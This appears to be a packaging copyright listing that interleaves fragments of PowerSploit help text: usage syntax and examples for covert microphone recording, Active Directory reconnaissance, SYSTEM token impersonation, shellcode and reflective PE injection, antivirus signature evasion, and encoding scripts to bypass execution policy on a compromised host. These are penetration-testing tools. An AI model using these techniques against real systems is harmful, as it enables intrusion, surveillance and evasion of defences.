 https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1
 #>
 .
 [CmdletBinding()] Param(

Files:     Exfiltration/Get-MicrophoneAudio.ps1
Copyright: __NO_COPYRIGHT__ in: Exfiltration/Get-MicrophoneAudio.ps1
License:   __UNKNOWN__
 All credit for PowerSploit functions belongs to the original author and project contributors. Thanks for the awesomeness! See here for more info:
 http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
 https://github.com/PowerShellMafia/PowerSploit
 .
 Thanks to Ed Wilson (Scripting Guy) for the one liner to generate random chars. https://blogs.technet.microsoft.com/heyscriptingguy/2015/11/05/generate-random-letters-with-powershell/
 .
 .DESCRIPTION
 Get-MicrophoneAudio utilizes the Windows API from winmm.dll to record audio from the microphone and saves the wave file to disk.
 .
 .OUTPUTS
 Outputs the FileInfo object pointing to the recording which has been saved to disk.
 .
 .PARAMETER Path
 The location to save the audio
 .
 .PARAMETER Length
 The length of the audio to record in seconds. Default: 30
 .
 .PARAMETER Alias
 The alias to use for the WinMM recording. Default: Random 10 Chars
 .
 .EXAMPLE
 Get-MicrophoneAudio -Path c:\windows\temp\secret.wav -Length 10 -Alias "SECRET"
 Description

Files:     docs/Recon/Get-DomainGPO.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainGPO.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### None (Default)
 ```
 Get-DomainGPO [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
 [-Raw]
 ```
 .
 ### ComputerIdentity
 ```
 Get-DomainGPO [[-Identity] <String[]>] [-ComputerIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]
 [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
 [-Credential <PSCredential>] [-Raw]
 ```
 .
 ### UserIdentity
 ```
 Get-DomainGPO [[-Identity] <String[]>] [-UserIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]
 [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
 [-Credential <PSCredential>] [-Raw]
 ```
 .
 ## DESCRIPTION
 Builds a directory searcher object using Get-DomainSearcher, builds a custom
 LDAP filter based on targeting/filter parameters, and searches for all objects
 matching the criteria.
 To only return specific properies, use
 "-Properties samaccountname,usnchanged,...".
 By default, all GPO objects for
 the current domain are returned.
 To enumerate all GPOs that are applied to
 a particular machine, use -ComputerName X.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainGPO -Domain testlab.local
 ```
 .
 Return all GPOs for the testlab.local domain
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainGPO -ComputerName windows1.testlab.local
 ```
 .
 Returns all GPOs applied windows1.testlab.local
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 "{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
 ```
 .
 Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display
 name of "Test GPO"
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Get-NetLocalGroupMember.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-NetLocalGroupMember.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-NetLocalGroupMember [[-ComputerName] <String[]>] [-GroupName <String>] [-Method <String>]
 [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function will enumerate the members of a specified local group  on the
 current, or remote, machine.
 By default, the Win32 API call NetLocalGroupGetMembers
 will be used (for speed).
 Specifying "-Method WinNT" causes the WinNT service provider
 to be used instead, which returns a larger amount of information.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-NetLocalGroupMember | ft
 ```
 .
 ComputerName   GroupName      MemberName     SID                   IsGroup       IsDomain

Files:     docs/Privesc/Find-PathDLLHijack.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Find-PathDLLHijack.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Find-PathDLLHijack
 ```
 .
 ## DESCRIPTION
 Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath
 to return the folder paths the current user can write to.
 On Windows 7, if wlbsctrl.dll is
 written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search
 order loading.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-PathDLLHijack
 ```
 .
 Finds all %PATH% .DLL hijacking opportunities.
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.HijackableDLL.Path
 .
 ## NOTES
 .
 ## RELATED LINKS

Files:     docs/Recon/Get-DomainController.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainController.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainController [[-Domain] <String>] [-Server <String>] [-LDAP] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Enumerates the domain controllers for the current or specified domain.
 By default built in .NET methods are used.
 The -LDAP switch uses Get-DomainComputer
 to search for domain controllers.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainController -Domain 'test.local'
 ```
 .
 Determine the domain controllers for 'test.local'.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainController -Domain 'test.local' -LDAP
 ```
 .
 Determine the domain controllers for 'test.local' using LDAP queries.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 'test.local' | Get-DomainController
 ```
 .
 Determine the domain controllers for 'test.local'.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/ScriptModification/Out-EncodedCommand.md
Copyright: __NO_COPYRIGHT__ in: docs/ScriptModification/Out-EncodedCommand.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### FilePath (Default)
 ```
 Out-EncodedCommand [[-Path] <String>] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64] [-WindowStyle <String>]
 [-EncodedOutput]
 ```
 .
 ### ScriptBlock
 ```
 Out-EncodedCommand [[-ScriptBlock] <ScriptBlock>] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64]
 [-WindowStyle <String>] [-EncodedOutput]
 ```
 .
 ## DESCRIPTION
 Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt.
 The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload.
 This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}
 ```

Files:     docs/AntivirusBypass/Find-AVSignature.md
Copyright: __NO_COPYRIGHT__ in: docs/AntivirusBypass/Find-AVSignature.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Find-AVSignature [-StartByte] <UInt32> [-EndByte] <String> [-Interval] <UInt32> [[-Path] <String>]
 [[-OutPath] <String>] [[-BufferLen] <UInt32>] [-Force]
 ```
 .
 ## DESCRIPTION
 Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe
 ```
 .
 Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
 Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
 Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
 Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose
 .
 ## PARAMETERS
 .
 ### -StartByte
 Specifies the first byte to begin splitting on.
 .
 ```yaml
 Type: UInt32
 Parameter Sets: (All)
 Aliases:
 .
 Required: True
 Position: 1
 Default value: 0
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -EndByte
 Specifies the last byte to split on.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: True
 Position: 2
 Default value: None
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Interval
 Specifies the interval size to split with.
 .
 ```yaml
 Type: UInt32
 Parameter Sets: (All)
 Aliases:
 .
 Required: True
 Position: 3
 Default value: 0
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Path
 Specifies the path to the binary you want tested.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 4
 Default value: ($pwd.path)
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -OutPath
 Optionally specifies the directory to write the binaries to.
 .
 ```yaml
 Type: String
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 5
 Default value: ($pwd)
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -BufferLen
 Specifies the length of the file read buffer .
 Defaults to 64KB.
 .
 ```yaml
 Type: UInt32
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: 6
 Default value: 65536
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ### -Force
 Forces the script to continue without confirmation.
 .
 ```yaml
 Type: SwitchParameter
 Parameter Sets: (All)
 Aliases:
 .
 Required: False
 Position: Named
 Default value: False
 Accept pipeline input: False
 Accept wildcard characters: False
 ```
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ## NOTES
 Several of the versions of "DSplit.exe" available on the internet contain malware.
 .
 ## RELATED LINKS
 .
 [http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
 https://github.com/mattifestation/PowerSploit
 http://www.exploit-monday.com/

Files:     docs/Recon/Set-DomainObject.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Set-DomainObject.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Set-DomainObject [[-Identity] <String[]>] [-Set <Hashtable>] [-XOR <Hashtable>] [-Clear <String[]>]
 [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Splats user/object targeting parameters to Get-DomainObject, returning the raw
 searchresult object.
 Retrieves the raw directoryentry for the object, and sets
 any values from -Set @{}, XORs any values from -XOR @{}, and clears any values
 from -Clear @().
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/Recon/Convert-ADName.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Convert-ADName.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Convert-ADName [-Identity] <String[]> [[-OutputType] <String>] [[-Domain] <String>] [[-Server] <String>]
 [[-Credential] <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)
 and translates Active Directory names between various formats using the NameTranslate COM object.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Convert-ADName -Identity "TESTLAB\harmj0y"
 ```
 .
 harmj0y@testlab.local
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```

Files:     Privesc/Get-System.ps1
Copyright: __NO_COPYRIGHT__ in: Privesc/Get-System.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Executes "getsystem" functionality similar to Meterpreter.
 'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create
 a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.
 NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure
 token duplication works correctly.
 .
 .PARAMETER Technique
 .
 The technique to use, 'NamedPipe' or 'Token'.
 .
 .PARAMETER ServiceName
 .
 The name of the service used with named pipe impersonation, defaults to 'TestSVC'.
 .
 .PARAMETER PipeName
 .
 The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.
 .
 .PARAMETER RevToSelf
 .
 Reverts the current thread privileges.
 .
 .PARAMETER WhoAmI
 .
 Switch. Display the credentials for the current PowerShell thread.
 .
 .EXAMPLE
 .
 Get-System
 .
 Uses named impersonate to elevate the current thread token to SYSTEM.
 .
 .EXAMPLE
 .
 Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'
 .
 Uses named impersonate to elevate the current thread token to SYSTEM
 with a custom service and pipe name.
 .
 .EXAMPLE
 .
 Get-System -Technique Token
 .
 Uses token duplication to elevate the current thread token to SYSTEM.
 .
 .EXAMPLE
 .
 Get-System -WhoAmI
 .
 Displays the credentials for the current thread.
 .
 .EXAMPLE
 .
 Get-System -RevToSelf
 .
 Reverts the current thread privileges.
 .
 .LINK
 .
 https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c
 https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot
 http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
 http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
 #>
 .
 [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
 [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]

Files:     docs/Recon/Find-DomainProcess.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Find-DomainProcess.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ### None (Default)
 ```
 Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
 [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
 [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]
 [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ### TargetProcess
 ```
 Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
 [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
 [-ProcessName <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ### UserIdentity
 ```
 Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
 [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
 [-UserIdentity <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ### TargetUser
 ```
 Find-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]
 [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]
 [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]
 [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]
 [-UserGroupIdentity <String[]>] [-UserAdminCount] [-Server <String>] [-SearchScope <String>]
 [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
 ```
 .
 ## DESCRIPTION
 This function enumerates all machines on the current (or specified) domain
 using Get-DomainComputer, and queries the domain for users of a specified group
 (default 'Domain Admins') with Get-DomainGroupMember.
 Then for each server the
 function enumerates any current processes running with Get-WMIProcess,
 searching for processes running under any target user contexts or with the
 specified -ProcessName.
 If -Credential is passed, it is passed through to
 the underlying WMI commands used to enumerate the remote machines.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-DomainProcess
 ```
 .
 Searches for processes run by 'Domain Admins' by enumerating every computer in the domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
 ```
 .
 Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by
 privileged users in dev.testlab.local.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Find-DomainProcess -ProcessName putty.exe
 ```
 .
 Searchings for instances of putty.exe running on the current domain.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Privesc/Get-UnattendedInstallFile.md
Copyright: __NO_COPYRIGHT__ in: docs/Privesc/Get-UnattendedInstallFile.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-UnattendedInstallFile
 ```
 .
 ## DESCRIPTION
 {{Fill in the Description}}
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-UnattendedInstallFile
 ```
 .
 Finds any remaining unattended installation files.
 .
 ## PARAMETERS
 .
 ## INPUTS
 .
 ## OUTPUTS
 .
 ### PowerUp.UnattendedInstallFile
 .
 Custom PSObject containing results.
 .
 ## NOTES
 .
 ## RELATED LINKS
 .
 [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)

Files:     docs/Recon/Get-DomainFileServer.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainFileServer.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainFileServer [[-Domain] <String[]>] [[-LDAPFilter] <String>] [[-SearchBase] <String>]
 [[-Server] <String>] [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>]
 [-Tombstone] [[-Credential] <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Returns a list of likely fileservers by searching for all users in Active Directory
 with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying
 the server names.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainFileServer
 ```
 .
 Returns active file servers for the current domain.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-DomainFileServer -Domain testing.local
 ```
 .
 Returns active file servers for the 'testing.local' domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```

Files:     docs/Recon/Get-DomainGPOUserLocalGroupMapping.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainGPOUserLocalGroupMapping.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainGPOUserLocalGroupMapping [[-Identity] <String>] [-LocalGroup <String>] [-Domain <String>]
 [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
 [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Takes a user/group name and optional domain, and determines the computers in the domain
 the user/group has local admin (or RDP) rights to.
 .
 It does this by:
 1.
 resolving the user/group to its proper SID
 2.
 enumerating all groups the user/group is a current part of
 and extracting all target SIDs to build a target SID list
 3.
 pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
 Get-DomainGPOLocalGroup
 4.
 matching the target SID list to the queried GPO SID list
 to enumerate all GPO the user is effectively applied with
 5.
 enumerating all OUs and sites and applicable GPO GUIs are
 applied to through gplink enumerating
 6.
 querying for all computers under the given OUs or sites
 .
 If no user/group is specified, all user/group -\> machine mappings discovered through
 GPO relationships are returned.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Find-GPOLocation
 ```
 .
 Find all user/group -\> machine relationships where the user/group is a member
 of the local administrators group on target machines.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Find-GPOLocation -UserName dfm -Domain dev.testlab.local
 ```
 .
 Find all computers that dfm user has local administrator rights to in
 the dev.testlab.local domain.
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Find-GPOLocation -UserName dfm -Domain dev.testlab.local
 ```
 .
 Find all computers that dfm user has local administrator rights to in
 the dev.testlab.local domain.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/CodeExecution/Invoke-ReflectivePEInjection.md
Copyright: __NO_COPYRIGHT__ in: docs/CodeExecution/Invoke-ReflectivePEInjection.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-ReflectivePEInjection [-PEBytes] <Byte[]> [[-ComputerName] <String[]>] [[-FuncReturnType] <String>]
 [[-ExeArgs] <String>] [[-ProcId] <Int32>] [[-ProcName] <String>] [-ForceASLR] [-DoNotZeroMZ]
 ```
 .
 ## DESCRIPTION
 Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```

Files:     docs/ScriptModification/Out-CompressedDll.md
Copyright: __NO_COPYRIGHT__ in: docs/ScriptModification/Out-CompressedDll.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Out-CompressedDll [-FilePath] <String>
 ```
 .
 ## DESCRIPTION
 Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Out-CompressedDll -FilePath evil.dll
 ```
 .
 Description

Files:     docs/Recon/Get-DomainSID.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-DomainSID.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-DomainSID [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Returns the SID for the current domain or the specified domain by executing

Files:     docs/CodeExecution/Invoke-Shellcode.md
Copyright: __NO_COPYRIGHT__ in: docs/CodeExecution/Invoke-Shellcode.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Invoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force]
 ```
 .
 ## DESCRIPTION
 Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
 .
 PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.
 To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):

Files:     AntivirusBypass/Find-AVSignature.ps1
Copyright: __NO_COPYRIGHT__ in: AntivirusBypass/Find-AVSignature.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.
 .
 .PARAMETER Startbyte
 .
 Specifies the first byte to begin splitting on.
 .
 .PARAMETER Endbyte
 .
 Specifies the last byte to split on.
 .
 .PARAMETER Interval
 .
 Specifies the interval size to split with.
 .
 .PARAMETER Path
 .
 Specifies the path to the binary you want tested.
 .
 .PARAMETER OutPath
 .
 Optionally specifies the directory to write the binaries to.
 .
 .PARAMETER BufferLen
 .
 Specifies the length of the file read buffer .  Defaults to 64KB.
 .
 .PARAMETER Force
 .
 Forces the script to continue without confirmation.
 .
 .EXAMPLE
 .
 Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe
 Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
 Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
 Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
 Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose
 .
 .NOTES
 .
 Several of the versions of "DSplit.exe" available on the internet contain malware.
 .
 .LINK
 .
 http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
 https://github.com/mattifestation/PowerSploit
 http://www.exploit-monday.com/

Files:     ScriptModification/Out-EncryptedScript.ps1
Copyright: __NO_COPYRIGHT__ in: ScriptModification/Out-EncryptedScript.ps1
License:   __UNKNOWN__
 .DESCRIPTION
 .
 Out-EncryptedScript will encrypt a script (or any text file for that
 matter) and output the results to a minimally obfuscated script -
 evil.ps1 by default.
 .
 .PARAMETER ScriptPath
 .
 Path to this script
 .
 .PARAMETER Password
 .
 Password to encrypt/decrypt the script
 .
 .PARAMETER Salt
 .
 Salt value for encryption/decryption. This can be any string value.
 .
 .PARAMETER InitializationVector
 .
 Specifies a 16-character the initialization vector to be used. This
 is randomly generated by default.
 .
 .EXAMPLE

Files:     docs/Recon/Get-WMIRegMountedDrive.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-WMIRegMountedDrive.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-WMIRegMountedDrive [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Uses remote registry functionality to enumerate recently mounted network drives.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-WMIRegMountedDrive
 ```
 .
 Returns the saved network mounted drives for the local machine.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
 ```
 .
 Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainComputer | Get-WMIRegMountedDrive
 ```
 .
 Returns the saved network mounted drives for all machines in the domain.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Get-WMIRegLastLoggedOn.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-WMIRegLastLoggedOn.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-WMIRegLastLoggedOn [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 This function uses remote registry to enumerate the LastLoggedOnUser registry key
 for the local (or remote) machine.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-WMIRegLastLoggedOn
 ```
 .
 Returns the last user logged onto the local machine.
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
 Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
 ```
 .
 Returns the last user logged onto WINDOWS1
 .
 ### -------------------------- EXAMPLE 3 --------------------------
 ```
 Get-DomainComputer | Get-WMIRegLastLoggedOn
 ```
 .
 Returns the last user logged onto all machines in the domain.
 .
 ### -------------------------- EXAMPLE 4 --------------------------
 ```

Files:     docs/Recon/Get-WMIRegProxy.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Get-WMIRegProxy.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Get-WMIRegProxy [[-ComputerName] <String[]>] [-Credential <PSCredential>]
 ```
 .
 ## DESCRIPTION
 Enumerates the proxy server and WPAD specification for the current user
 on the local machine (default), or a machine specified with -ComputerName.
 It does this by enumerating settings from
 HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-WMIRegProxy
 ```
 .
 ComputerName           ProxyServer            AutoConfigURL         Wpad

Files:     docs/Recon/Export-PowerViewCSV.md
Copyright: __NO_COPYRIGHT__ in: docs/Recon/Export-PowerViewCSV.md
License:   __UNKNOWN__
 ## SYNTAX
 .
 ```
 Export-PowerViewCSV -InputObject <PSObject[]> [-Path] <String> [[-Delimiter] <Char>] [-Append]
 ```
 .
 ## DESCRIPTION
 This helper exports an -InputObject to a .csv in a thread-safe manner
 using a mutex.
 This is so the various multi-threaded functions in
 PowerView has a thread-safe way to export output to the same file.
 Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
 .
 Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
 .
 ## EXAMPLES
 .
 ### -------------------------- EXAMPLE 1 --------------------------
 ```
 Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
 ```
 .
 ### -------------------------- EXAMPLE 2 --------------------------
 ```
